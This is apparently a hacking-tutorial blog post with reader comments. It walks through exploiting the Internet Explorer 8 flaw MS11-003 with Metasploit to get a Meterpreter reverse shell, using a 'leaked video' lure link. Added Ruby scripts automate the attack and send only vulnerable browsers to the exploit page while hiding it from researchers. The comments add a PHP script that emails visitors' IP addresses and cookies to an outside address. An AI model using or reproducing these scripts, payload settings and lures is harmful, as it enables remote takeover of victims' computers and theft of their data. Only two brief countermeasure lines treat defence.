Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5
Victim O.S : Windows 7 SP 1
Victim Browser : Internet Explorer 8
Microsoft Internet Explorer has yet another vulnerability, after the many already found by security researchers. MS11-003 was published on February 8, 2011 in the corresponding Microsoft security bulletin; the CSS @import bug it fixes is tracked as CVE-2010-3971.
In this tutorial we will exploit MS11-003 using the Metasploit module ms11_003_ie_css_import. According to the Metasploit website:
This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a recursive CSS import, a C++ object is deleted and later reused. This leads to arbitrary code execution. This exploit utilizes a combination of heap spraying and the .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not opt-in to ASLR. As such, this module should be reliable on all Windows versions with .NET 2.0.50727 installed.
Let's prepare the attack! We need:
1. Metasploit Framework (website)
2. Operating System (I'm using Backtrack 5 in this tutorial)
3. ms11_003_ie_css_import exploit — download from mediafire.com
1. First, update your Metasploit Framework to the latest version by running the msfupdate command. If you don't have an internet connection for the update, download the exploit module from the link above and copy it to /pentest/exploits/framework3/modules/exploits/windows/browser.
2. Next, load the exploit module with the command use exploit/windows/browser/ms11_003_ie_css_import. In this tutorial I'm using the windows/meterpreter/reverse_tcp payload, but you can choose another payload to suit your needs.

3. After the exploit and payload are set up, we need to configure the module options. In the picture below I'm setting the options needed to perform the attack in my setup:
set srvhost 192.168.8.93 --> the address our web server listens on; change it to your own IP.
set srvport 80 --> the port that serves the malicious page; port 80 looks like ordinary web traffic, which is best for social engineering.
set uripath avril-video-leaked.avi --> the path in the URL; choose something that makes the victim curious enough to open the link.
set lhost 192.168.8.93 --> the IP address the payload connects back to once the victim is exploited.
set lport 443 --> the port the payload connects back to. Since the web server and the handler run on the same machine here, this must differ from srvport.
exploit --> starts the server and prints the link used in the attack.
http://192.168.8.93/avril-video-leaked.avi --> this is the URL that will be given to the victim.
4. When the victim opens the malicious link we gave them, here's the screenshot of the attacker console.
The screenshot above shows that the exploit succeeded and that the Meterpreter session has migrated into a notepad.exe process on the victim's computer (the module's default autorun script migrates out of the browser process so the session survives if Internet Explorer crashes).
5. To check whether we have an active session from the victim, run the sessions -l command to list active sessions.
6. Looks great! We have an active session; interact with it using sessions -i 1 and do whatever you need.
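The steps above, collected into one msfconsole resource script. This is an added example, not part of the original tutorial and not Metasploit's own code: the addresses, ports and URI path are the tutorial's values and are assumed, and check_options flags the mistakes that most often break this particular setup (an invalid IP, a bad port, and the exploit's web server and the reverse handler colliding on the same address and port, which matters here because SRVHOST and LHOST are the same machine).

```ruby
# Added example, not part of the original tutorial or of Metasploit.
# Prints the msfconsole resource script for the steps above after checking the
# options. Addresses, ports and URI path are the tutorial's values (assumed).
require 'ipaddr'

MODULE_PATH = 'exploit/windows/browser/ms11_003_ie_css_import'
PAYLOAD     = 'windows/meterpreter/reverse_tcp'

# The option set used in the tutorial (assumed; replace with your own).
TUTORIAL_OPTS = {
  'srvhost' => '192.168.8.93',
  'srvport' => '80',
  'uripath' => 'avril-video-leaked.avi',
  'lhost'   => '192.168.8.93',
  'lport'   => '443'
}.freeze

# Returns a list of configuration problems; empty when the options are consistent.
def check_options(opts)
  problems = []
  %w[srvhost lhost].each do |k|
    begin
      IPAddr.new(opts[k].to_s)
    rescue ArgumentError
      problems << "#{k}=#{opts[k]} is not a valid IP address"
    end
  end
  %w[srvport lport].each do |k|
    port = opts[k].to_i
    problems << "#{k}=#{opts[k]} is not a valid TCP port" unless (1..65_535).cover?(port)
  end
  # The exploit's web server and the payload handler both bind on the attacker
  # box; when they share an address they must not share a port.
  if opts['srvhost'] == opts['lhost'] && opts['srvport'].to_i == opts['lport'].to_i
    problems << 'srvport and lport collide on the same address'
  end
  problems
end

# Options whose port is below 1024 (80 and 443 here): msfconsole must run as root.
def privileged_ports(opts)
  %w[srvport lport].select { |k| opts[k].to_i.between?(1, 1023) }
end

# The resource script: one console command per line, in the tutorial's order.
def resource_script(opts)
  lines = ["use #{MODULE_PATH}", "set PAYLOAD #{PAYLOAD}"]
  %w[SRVHOST SRVPORT URIPATH LHOST LPORT].each { |k| lines << "set #{k} #{opts[k.downcase]}" }
  lines << 'exploit -j' # -j keeps the server as a background job so the console stays usable
  lines.join("\n") + "\n"
end

# The link to hand to the victim, as written in step 3 (port 80 is implied).
def landing_url(opts)
  port = opts['srvport'].to_i
  host = port == 80 ? opts['srvhost'] : "#{opts['srvhost']}:#{port}"
  "http://#{host}/#{opts['uripath'].to_s.sub(%r{\A/+}, '')}"
end

if __FILE__ == $PROGRAM_NAME
  problems = check_options(TUTORIAL_OPTS)
  abort(problems.join("\n")) unless problems.empty?
  puts resource_script(TUTORIAL_OPTS)
  warn "run msfconsole as root: #{privileged_ports(TUTORIAL_OPTS).join(', ')} are privileged ports"
  warn "send the victim: #{landing_url(TUTORIAL_OPTS)}"
end
```

Save the printed script as ms11_003.rc and start it with msfconsole -r ms11_003.rc; the exploit -j line starts the server as a job, so sessions -l and sessions -i 1 work from the same console once the victim connects.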

PWNED!
Countermeasures:
1. Always update your browser to the latest version (here, install the MS11-003 update) and keep Windows patched.
2. Don't open links you don't know or didn't expect, even when they promise something interesting.
Hope it's useful.
Hello. Your site is good; I like your tutorials. Please help me with a doubt. I run BT5 on VirtualBox and use Windows 7 and XP VMs for pentesting. While using a browser-based client-side exploit, Metasploit generates a link for us which the target will have to open in his browser so that the exploit runs and we get a session. My question is that the link Metasploit generates is of the form 192.168.56.101:8080 or 10.0.2.15. These two addresses belong to the local network, I hope. Can we target any user on the internet using these browser-based exploits? How can we generate a global link which can be sent to any target?
#darklord
You can view my other tutorial here http://www.hacking-tutorial.com/computer/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/ about the logic.
Hi, thanks for the tutorials. The browser-based attack is good, but I'm trying to do something else; I might be thinking wrong. What I try to do is WAN IP traffic --> forward to --> LAN host PC, then perform a MITM attack,
trying to do the same MITM over a WAN IP as we do in a LAN network.
I think iptables could do some magic here.
So much confusion lol :))
Before, I meant: what should I write on my HTML page to find the vulnerabilities of the victim who will click the link that I will send? How can I find which version of Internet Explorer, or whatever browser, the victim uses? I ask these things because I think I need this kind of information for this type of attack. If I am wrong, correct me...
#Baldassarre
If you are familiar with server-side scripting (e.g. PHP), you can use HTTP_USER_AGENT to
check the type and version of the user's browser and, if it matches, redirect it to the exploit server.
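One way to do the User-Agent check from the reply above, written here in Ruby rather than PHP. This is an added example, not code from the original post: it parses the Internet Explorer User-Agent string, accepts only IE8 on Windows 7 that advertises the ".NET CLR 2.0.50727" token (the .NET 2.0 runtime whose mscorie.dll the module relies on), and redirects those visitors to the Metasploit URL while everyone else gets a decoy page. The exploit URL is the tutorial's value and the decoy URL is a placeholder; both are assumptions, as is the choice to restrict to Windows 7 to match this tutorial's setup.

```ruby
# Added example, not code from the original post. Gate visitors on the
# User-Agent header: only IE8 on Windows 7 that advertises .NET 2.0 is sent to
# the Metasploit URL, everything else to a harmless page. Both URLs are assumed.
EXPLOIT_URL = 'http://192.168.8.93/avril-video-leaked.avi'
DECOY_URL   = 'http://example.com/'

# Extract what we need from an Internet Explorer User-Agent string.
# Returns nil for anything that is not IE.
def parse_ie_ua(ua)
  return nil unless ua && (m = ua.match(/MSIE (\d+)\.\d+/))
  {
    ie_major:   m[1].to_i,
    # Windows NT 6.1 is Windows 7 (and Server 2008 R2); 6.0 is Vista, 5.1 is XP.
    nt_version: ua[/Windows NT (\d+\.\d+)/, 1],
    # IE lists the installed .NET runtimes; mscorie.dll belongs to 2.0.50727.
    dotnet2:    ua.include?('.NET CLR 2.0.50727'),
    # IE8 in compatibility view reports "MSIE 7.0" but still "Trident/4.0".
    trident:    ua[/Trident\/(\d+\.\d+)/, 1]
  }
end

# True when the visitor matches the setup this tutorial exploits.
def exploitable_target?(ua)
  info = parse_ie_ua(ua)
  return false unless info
  ie8 = info[:ie_major] == 8 || (info[:ie_major] == 7 && info[:trident] == '4.0')
  ie8 && info[:nt_version] == '6.1' && info[:dotnet2]
end

# Pick the redirect target for a request.
def redirect_for(ua)
  exploitable_target?(ua) ? EXPLOIT_URL : DECOY_URL
end

# Tiny HTTP front door that answers every path with a 302 to the result of
# redirect_for. webrick is a separate gem on Ruby 3 and later.
def serve_gate(port = 8000)
  require 'webrick'
  server = WEBrick::HTTPServer.new(Port: port)
  server.mount_proc('/') do |req, res|
    res.status = 302
    res['Location'] = redirect_for(req['User-Agent'])
  end
  trap('INT') { server.shutdown }
  server.start
end

# Constructed sample User-Agent strings show the decision; pass "serve" as the
# first argument to actually listen on port 8000.
if __FILE__ == $PROGRAM_NAME
  if ARGV.first == 'serve'
    serve_gate
  else
    [
      'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.5.30729)',
      'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)',
      'Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0'
    ].each { |ua| puts "#{redirect_for(ua)}  <- #{ua}" }
  end
end
```

The User-Agent is client-supplied, so this only filters out obvious non-targets (other browsers, crawlers, researchers with curl); it cannot confirm that the patch is missing, and a visitor that spoofs the header will be sent to the exploit page regardless.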
How can I find the vulnerabilities of the victim's computer with a malicious link? What should I write in my HTML page? Please give an answer.
#dean
Maybe you can view my last comment to Baldassarre.
Thanks, I've just tried it and now I know how to view the victim's user agent, but what about the Adobe Reader, Flash Player and Windows Media Player versions? I can't find anywhere what I should write in the PHP script to find their versions...
I would like to ask you another question: how can I redirect to the correct exploit server? What am I supposed to do?
#Baldassarre
I can't give you an answer for that; you can Google for it.
This is the PHP script that I have found. I would like to find more information about the victim's system, but I don't know what I should add to this script.
<?php
// Logs the visitor's IP, User-Agent, language and an optional ?c= value, and mails them.
// $base was never defined in the original; it is rebuilt here from the request.
$ip        = $_SERVER['REMOTE_ADDR'];
$userAgent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
$accept    = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : '';
$cookie    = isset($_GET['c']) ? $_GET['c'] : '';
$scheme    = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$base      = $scheme . '://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
$myemail = "aaranan_12@gmail.com";
$today = date("l, F j, Y, g:i a");
$subject = "IP address";
$message = "Here is the IP address, with the date and time it was sent:
Ip: $ip
Cookie: $cookie
Browser: $userAgent
Language: $accept
Url: $base
Date & Time: $today \n
";
$from = "From: $myemail\r\n";
mail($myemail, $subject, $message, $from);
?>
I've already tried and I didn't find anything about it. Thanks anyway.
Hey, amazing tutorial, but when I tried to download IE 8 (I have IE 9, not as the default browser) it says it's not supported on this system (Win 7 SP1). Any idea?
#boris
it only works on IE8
My bad, I mean I tried to install IE8, but it says it's not supported (Win 7). I don't know where the problem is, or whether it's just because it's Internet Explorer. Thank you.